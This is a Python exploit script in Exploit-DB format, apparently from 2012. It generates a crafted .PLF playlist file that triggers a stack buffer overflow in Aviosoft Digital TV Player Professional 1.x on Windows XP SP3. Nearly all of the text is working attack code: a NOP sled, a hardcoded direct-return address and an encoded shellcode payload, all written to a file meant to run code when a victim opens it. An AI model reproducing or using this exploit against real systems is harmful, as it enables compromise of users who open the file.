# Exploit Title: Aviosoft Digital TV Player Professional 1.x (Direct Retn) # Date: 11-25-2012 # Exploit Author: Nezim (@nezimlufni) # Vendor Homepage: http://www.aviosoft.com/ # Version: Aviosoft Digital TV Player Professional 1.x # Tested on: Windows XP SP3 # Reference : http://www.exploit-db.com/exploits/18096/ # Thanks to : modpr0be , @ardynetral # Website : http://is2c-dojo.com filename="video.PLF" junk = "http://"+"\x90"*253 junk +="\x33\xBF\x96\x7C" junk +="\x90" * 32 junk +=("\xdb\xdc\x2b\xc9\xb1\x51\xbb\x01\x5c\x8e\x27\xd9\x74\x24\xf4\x58" "\x83\xc0\x04\x31\x58\x13\x03\x59\x4f\x6c\xd2\xa5\x05\x9b\x50\xbd" "\x23\xa4\x94\xc2\xb4\xd0\x07\x18\x11\x6c\x92\x5c\xd2\x0e\x18\xe4" "\xe5\x01\xa9\x5b\xfe\x56\xf1\x43\xff\x83\x47\x08\xcb\xd8\x59\xe0" "\x05\x1f\xc0\x50\xe1\x5f\x87\xaf\x2b\x95\x65\xae\x69\xc1\x82\x8b" "\x39\x32\x43\x9e\x24\xb1\xcc\x44\xa6\x2d\x94\x0f\xa4\xfa\xd2\x50" "\xa9\xfd\x0f\x6d\xfd\x76\x46\x1d\xd9\x94\x38\x1e\x10\x7e\xde\x2b" "\x10\xb0\x94\x6b\x9b\x3b\xda\x77\x0e\xb0\x5b\x8f\x0e\xaf\xd5\xc1" "\xa0\xc3\xba\x22\x6a\x7d\x68\xba\xfb\xb1\xbc\x2a\x8b\xc6\xf2\xf5" "\x27\xd6\x23\x61\x03\xc5\x38\x4a\xc3\xe9\x17\xf3\x6a\xf0\xfe\x8a" "\x80\xf3\xfc\xd9\x30\x06\xfe\x31\xac\xdf\x09\x44\x80\xb7\xf6\x70" "\x88\x64\x5a\x2f\x7c\xc8\x0f\x8c\xd1\x31\x7f\x74\xbe\xdc\xdc\x1e" "\x6d\x56\x3d\x4b\xf9\xcc\xa4\x03\x3d\x5b\x26\x35\xab\x74\x89\xec" "\xd3\xa5\x41\xaa\x81\x68\x7b\xe5\x26\xa2\x28\x5c\x26\x9b\xa7\xbb" "\x91\x9a\x71\x14\xdd\x75\xd1\xce\x75\x2f\x2d\x3e\xe6\xa7\x36\xc7" "\xcf\x41\xee\xc8\x06\xe4\xef\xe6\xc1\x6d\x74\x60\x66\x11\x19\xe5" "\x93\xbf\xb1\xac\x72\x8c\xbb\xa9\xef\x48\x35\xd7\xc1\x90\xb6\xbd" "\xdc\x53\x14\x3f\x62\x78\xf5\x32\x19\xb8\x52\xe7\x75\xd0\xd6\x09" "\x3a\x37\xe8\x80\x79\xc7\xc0\x31\xd5\x65\xbc\x94\x88\xe3\x3f\x47" "\x7a\xa1\x6e\x98\xac\x21\x3c\xbf\x48\x7c\x6d\xc0\x85\xea\x6d\xc1" "\x1d\x14\x41\xb6\x35\x16\xe1\x0c\xdd\x19\x30\xde\xe1\x36\xd5\xa0" "\xc5\x55\x55\x0f\x09\x4f\x65\x7f") junk +="\x90" * (261-len(junk)) junk +="\CC" * (1000-len(junk)) exploitf = open(filename,"wb") exploitf.write(junk) exploitf.close() print("Finish") #Husnul Khatimah